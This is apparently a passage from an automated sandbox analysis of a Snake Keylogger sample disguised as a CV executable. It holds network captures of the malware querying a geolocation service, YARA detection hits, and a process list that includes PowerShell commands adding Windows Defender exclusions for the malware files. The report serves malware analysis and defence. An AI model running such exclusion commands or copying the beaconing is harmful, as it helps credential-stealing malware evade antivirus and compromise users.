                                              2024-11-18 17:21:31 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.549732188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:31 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:32 UTC843INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:32 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 560
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0P6XZTWKg4kG080ekDcP58CVxESgCUNGQj9n8TfM2etLsbWNrUogbAF4MvvHjifFVZhOmswUqNART0mpWpJ8v73ykqXgZSZAR2%2BfRjefZQ4PT8F3gG9m1ijtoHdpS80qW8Nm8Ok"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a32f3ae3629f-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=24543&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=118045&cwnd=32&unsent_bytes=0&cid=83b8618675b71414&ts=183&x=0"
                                              2024-11-18 17:21:32 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.549741188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:33 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:33 UTC855INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:33 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 51967
                                              Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5994XdqOpN%2FH6d5nItlOsFclUWm5QmQIgQia2e0%2BszGROIF0fZiiOGjlvQ6ByKQGybjlT6eEc4es03DooE9%2FMX2dGvFGoj%2Fbp8lS8ryt1z8uAQmLF%2Ffd%2Br1YxaRGsIvU52nsxv8w"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a3382ff7e76f-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153495&cwnd=32&unsent_bytes=0&cid=4365e0d97803e991&ts=429&x=0"
                                              2024-11-18 17:21:33 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.549742188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:34 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:34 UTC854INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:34 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 6532
                                              Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ueIhWT8rLmmar6lru81oJmPl7Vzs0qdORvPPgp2bLuAU4iv%2B2o69n5JP9oGt%2BHo6pJpQKUD%2Bl%2FjI%2B9JFn2uwwA0DTl4yRgNbA9mPpSdYZ1PEIPfSC1BIVQvVK52u32TbKaj%2F0wjW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a33c2bca44e4-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=17388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=166417&cwnd=32&unsent_bytes=0&cid=0e1be72630b75640&ts=191&x=0"
                                              2024-11-18 17:21:34 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.549754188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:35 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:35 UTC848INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:35 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 6533
                                              Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Syfe2HUmYN2eEcWN5Kwowi2jjZ9pfOWXJtLQYWZi5EfA8iGtgotDDKOZEMnjGVaK0pUtOt%2FC1Qx%2BPwOGh21c4w8qonwYZbUWTztdctVfN1ddL3HQeuExINIqGHs6%2F3Us0St17byQ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a342f9f053be-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=19996&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=144836&cwnd=32&unsent_bytes=0&cid=bab9ac4dc596afda&ts=179&x=0"
                                              2024-11-18 17:21:35 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.549762188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:36 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:37 UTC853INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:36 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 564
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQa4CaraNaU60vrjdwmGpNzL3LX8BaZqlbXdqW3fLEgKEqaNan0QWEl%2FoBNhS%2Fvfa2F6RSdJ2kPzK3PdQ1IQZc0RYIaQo%2FLoJRjl9%2BDwToC3dmpdULHH%2FVt2hbP5MbDQtx8ZwWD%2B"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a34dd974eaff-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=23516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=122748&cwnd=32&unsent_bytes=0&cid=03bd0d7a8b8fed92&ts=173&x=0"
                                              2024-11-18 17:21:37 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.549773188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:38 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:38 UTC857INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:38 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 566
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEnhygAOPA7AEklvdIs5Urc9QsjU2Bn4rvRUipB8xVqz%2FCh26aJT5LssxNPtj7H%2B90ox5tvT0jgAulK%2FeIJXcEoul5xFuVOYpik%2Fl20%2BEtng7trkTLLz%2B9satmBB%2FXyjD9j%2FogLM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a358de5b2c1d-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=24301&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=119329&cwnd=32&unsent_bytes=0&cid=037a2fcaf69fc991&ts=174&x=0"
                                              2024-11-18 17:21:38 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.549784188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:40 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:40 UTC855INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:40 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 51974
                                              Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2s1wWq4z9YPq6w%2F98hifRYF%2Bk7vLRIe5l%2F85KN%2B7R1Mq2e%2BdKns9nMgj8KUF5Eo0EvOajcD1%2Fd2iUGFv9Wmabd1dPQKG60vzExhetJr8hsZk9Ybx8s8vrQb7IDX8z9VxhKI1z4Yd"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a3637a5de76d-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=154899&cwnd=32&unsent_bytes=0&cid=65a1e79055a24291&ts=161&x=0"
                                              2024-11-18 17:21:40 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.549796188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:42 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:42 UTC847INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:42 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 51976
                                              Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Am3ODeEBehNs9VEbRhtF3pG5QTUSsnrd9%2Beefu2m859WbJWjq1wMH03upaW9m0oCPNNXms331PriXy%2F2Xq1rfg3dqTWyhDb1PI2ix6q7NlT2Z8KCexEgrsFnYsrHsoxy4vC4aTXX"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a36e0ed5e759-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18895&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152758&cwnd=32&unsent_bytes=0&cid=0ffcd3b04f188597&ts=168&x=0"
                                              2024-11-18 17:21:42 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:12:21:10
                                              Start date:18/11/2024
                                              Path:C:\Users\user\Desktop\Kayla Dennis CV.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Kayla Dennis CV.exe"
                                              Imagebase:0xff0000
                                              File size:634'888 bytes
                                              MD5 hash:8F6D690E119684B1629D41F97B83FB23
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:12:21:16
                                              Start date:18/11/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
                                              Imagebase:0xc10000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:12:21:16
                                              Start date:18/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:12:21:16
                                              Start date:18/11/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
                                              Imagebase:0xc10000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
